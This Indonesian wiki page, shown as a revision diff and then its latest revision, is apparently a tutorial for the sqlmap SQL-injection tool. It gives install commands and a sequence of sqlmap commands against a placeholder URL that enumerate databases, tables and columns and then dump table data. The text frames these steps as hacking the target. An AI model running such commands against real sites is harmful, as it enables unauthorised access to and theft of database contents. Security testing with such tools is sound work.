SQLMAP: Difference between revisions
m Kangtain moved page SQLMAP to Software/SQLMAP |
No edit summary |
||
| (4 intermediate revisions by the same user not shown) | |||
| Line 6: | Line 6: | ||
<syntaxhighlight lang="shell"> | <syntaxhighlight lang="shell"> | ||
wget 'https://github.com/sqlmapproject/sqlmap/tarball/master' --output-document=sqlmap.tar.gz | wget 'https://github.com/sqlmapproject/sqlmap/tarball/master' --output-document=sqlmap.tar.gz | ||
</syntaxhighlight><syntaxhighlight lang="shell"> | </syntaxhighlight> | ||
<syntaxhighlight lang="shell"> | |||
tar -xvf sqlmap.tar.gz | tar -xvf sqlmap.tar.gz | ||
</syntaxhighlight><syntaxhighlight lang="shell"> | </syntaxhighlight> | ||
<syntaxhighlight lang="shell"> | |||
cd sqlmapproject-sqlmap-c4f9e66/ | cd sqlmapproject-sqlmap-c4f9e66/ | ||
</syntaxhighlight><syntaxhighlight lang="shell"> | </syntaxhighlight> | ||
<syntaxhighlight lang="shell"> | |||
python sqlmap.py --version | python sqlmap.py --version | ||
</syntaxhighlight> | </syntaxhighlight> | ||
*Atau bisa menggunakana perintah berikut | |||
*Atau bisa menggunakana perintah berikut | |||
<syntaxhighlight lang="shell"> | <syntaxhighlight lang="shell"> | ||
sudo apt install sqlmap | sudo apt install sqlmap | ||
| Line 35: | Line 42: | ||
sqlmap -u http://www.example.com/about.php?id=1 --dbs | sqlmap -u http://www.example.com/about.php?id=1 --dbs | ||
</syntaxhighlight> | </syntaxhighlight> | ||
*Sekarang retas tabel database yang diretas. | *Sekarang retas tabel database yang diretas. | ||
*Dimana | *Dimana | ||
| Line 51: | Line 59: | ||
sqlmap -u http://www.example.com/about.php?id=1 --dbs -D exampledb --tables | sqlmap -u http://www.example.com/about.php?id=1 --dbs -D exampledb --tables | ||
</syntaxhighlight> | </syntaxhighlight> | ||
*Tugas selanjutnya adalah mengambil kolom dari tabel apa pun. | *Tugas selanjutnya adalah mengambil kolom dari tabel apa pun. | ||
*Dimana | *Dimana | ||
| Line 67: | Line 76: | ||
sqlmap -u http://www.example.com/about.php?id=1 --dbs -D exampledb --tables -T apllied_items --columns | sqlmap -u http://www.example.com/about.php?id=1 --dbs -D exampledb --tables -T apllied_items --columns | ||
</syntaxhighlight> | </syntaxhighlight> | ||
*Sekarang ini adalah tugas terakhir Anda mengambil data nyata dari tabel. | *Sekarang ini adalah tugas terakhir Anda mengambil data nyata dari tabel. | ||
*Dimana | *Dimana | ||
| Line 83: | Line 93: | ||
sqlmap -u http://www.example.com/about.php?id=1 --dbs -D exampledb --tables -T apllied_items --columns -C menuid --dump | sqlmap -u http://www.example.com/about.php?id=1 --dbs -D exampledb --tables -T apllied_items --columns -C menuid --dump | ||
</syntaxhighlight> | </syntaxhighlight> | ||
[[Category:Software]] | [[Category:Software]] | ||
[[Category:Linux]] | [[Category:Linux]] | ||
[[Category:Security]] | [[Category:Security]] | ||
Latest revision as of 16:24, 14 December 2025
SQLMAP adalah alat pengujian penetrasi open source yang mengotomatiskan proses mendeteksi dan mengeksploitasi kelemahan injeksi SQL dan mengambil alih server database. Ini adalah alat open source untuk menggunakan injeksi sql dengan cara yang lebih baik dan lebih sederhana.
Ini sudah diinstal sebelumnya pada Sistem Operasi KALI LINUX.
Installasi
wget 'https://github.com/sqlmapproject/sqlmap/tarball/master' --output-document=sqlmap.tar.gz
tar -xvf sqlmap.tar.gz
cd sqlmapproject-sqlmap-c4f9e66/
python sqlmap.py --version
- Atau bisa menggunakana perintah berikut
sudo apt install sqlmap
Usage
- Buka direktori sqlmap Anda dan Jalankan perintah ini untuk menguji perintah sql.
- Dimana
-u :- artinya url yang akan kita hack
–dbs :- perintah akan menampilkan daftar database yang dapat diretas.
Ubuntu
./sqlmap.py -u http://www.example.com/about.php?id=1 --dbs
Kali Linux
sqlmap -u http://www.example.com/about.php?id=1 --dbs
- Sekarang retas tabel database yang diretas.
- Dimana
-D :- berarti nama database yang akan Anda retas
–tabel :- perintah akan menampilkan semua tabel database yang diretas.
Ubuntu
./sqlmap.py -u http://www.example.com/about.php?id=1 --dbs -D exampledb --tables
Kali Linux
sqlmap -u http://www.example.com/about.php?id=1 --dbs -D exampledb --tables
- Tugas selanjutnya adalah mengambil kolom dari tabel apa pun.
- Dimana
-T :- artinya Nama tabel yang akan diretas
–columns :- perintah akan menampilkan semua kolom tabel.
Ubuntu
./sqlmap.py -u http://www.example.com/about.php?id=1 --dbs -D exampledb --tables -T apllied_items --columns
Kali Linux
sqlmap -u http://www.example.com/about.php?id=1 --dbs -D exampledb --tables -T apllied_items --columns
- Sekarang ini adalah tugas terakhir Anda mengambil data nyata dari tabel.
- Dimana
-C :- artinya nama Kolom tabel.
–dump :- perintah akan menampilkan semua data dari kolom yang diberikan.
Ubuntu
./sqlmap.py -u http://www.example.com/about.php?id=1 --dbs -D exampledb --tables -T apllied_items --columns -C menuid --dump
Kali Linux
sqlmap -u http://www.example.com/about.php?id=1 --dbs -D exampledb --tables -T apllied_items --columns -C menuid --dump